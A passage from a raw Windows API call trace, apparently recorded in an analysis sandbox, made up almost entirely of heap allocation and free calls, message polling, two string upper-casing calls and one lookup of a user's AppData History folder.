(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0168.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0168.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0168.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0168.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0168.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0168.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0168.220] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0168.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0168.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0168.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0168.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0168.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0168.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0168.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0168.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0168.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0168.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0168.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0168.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0168.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.227] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/History", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0x9e1b38 [0168.326] FindClose (in: hFindFile=0x9e1b38 | out: hFindFile=0x9e1b38) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0168.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.327] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0168.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0168.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0168.328] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0168.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0168.328] PeekMessageW (in: lpMsg=0x8cf4a8, 